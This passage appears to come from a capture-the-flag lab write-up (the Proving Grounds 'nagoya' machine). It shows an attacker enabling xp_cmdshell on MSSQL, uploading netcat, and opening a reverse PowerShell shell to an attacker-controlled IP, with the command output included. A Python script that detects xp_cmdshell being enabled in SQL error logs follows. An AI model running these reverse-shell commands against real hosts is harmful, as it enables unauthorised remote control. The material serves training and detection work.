svc_mssql


Upon a successful TGS forgery, I have established a session to the target’s internal MSSQL instance.

SQL (NAGOYA-IND\Administrator  dbo@master)> enable_xp_cmdshell
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell whoami
output                 
--------------------   
nagoya-ind\svc_mssql   
 
NULL

Enabling xp_cmdshell

*Evil-WinRM* PS C:\tmp> upload nc64.exe
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/nc64.exe to C:\tmp\nc64.exe
Data: 58260 bytes of 58260 bytes copied
Info: Upload successful!

Delivering a Netcat binary

SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell "C:\tmp\nc64.exe 192.168.45.220 4444 -e powershell"

Invoking a reverse shell

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ nnc 4444                     
listening on [any] 4444 ...
connect to [192.168.45.220] from (UNKNOWN) [192.168.158.21] 50239
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> powershell -ep bypass -nop
 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
whoami
nagoya-ind\svc_mssql
PS C:\Windows\system32> hostname
hostname
nagoya
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.158.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.158.254

Lateral movement to the DC host as the svc_mssql account, achieved by compromising the target’s internal MSSQL instance.
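From the defender's side, the step that makes this chain visible is the one shown above: enabling xp_cmdshell writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line to the SQL Server error log. The following script is an added example (not part of the original write-up) that parses constructed error-log lines in that format and flags any watched sp_configure option being switched on; the log lines and the watched-option set are assumptions, not data from the target.

```python
import re

# Constructed sample of SQL Server error-log lines modelled on the messages
# printed when xp_cmdshell is enabled (not captured from a real host).
SAMPLE_ERRORLOG = """\
2024-01-01 10:00:01.10 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-01 10:00:01.12 spid51 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-01 10:05:22.40 spid52 Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2024-01-01 10:30:00.00 spid51 Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# One sp_configure change message: timestamp, session id, option, old and new value.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+(?P<spid>spid\d+)\s+Configuration option '(?P<option>[^']+)' "
    r"changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Assumed watch-list: options that hand OS-level execution to a SQL login.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}


def find_enablements(log_text):
    """Return (timestamp, spid, option) for each watched option turned on (0 -> non-zero).

    A 1 -> 0 change (the option being disabled again) is deliberately not reported.
    """
    hits = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        if m["option"] in WATCHED_OPTIONS and m["old"] == "0" and m["new"] != "0":
            hits.append((m["ts"], m["spid"], m["option"]))
    return hits


if __name__ == "__main__":
    for ts, spid, option in find_enablements(SAMPLE_ERRORLOG):
        print(f"ALERT {ts} {spid}: '{option}' was enabled")
```

The same check can be run against a live instance by reading value_in_use from sys.configurations instead of the error log, which also catches an option that was enabled before log retention began.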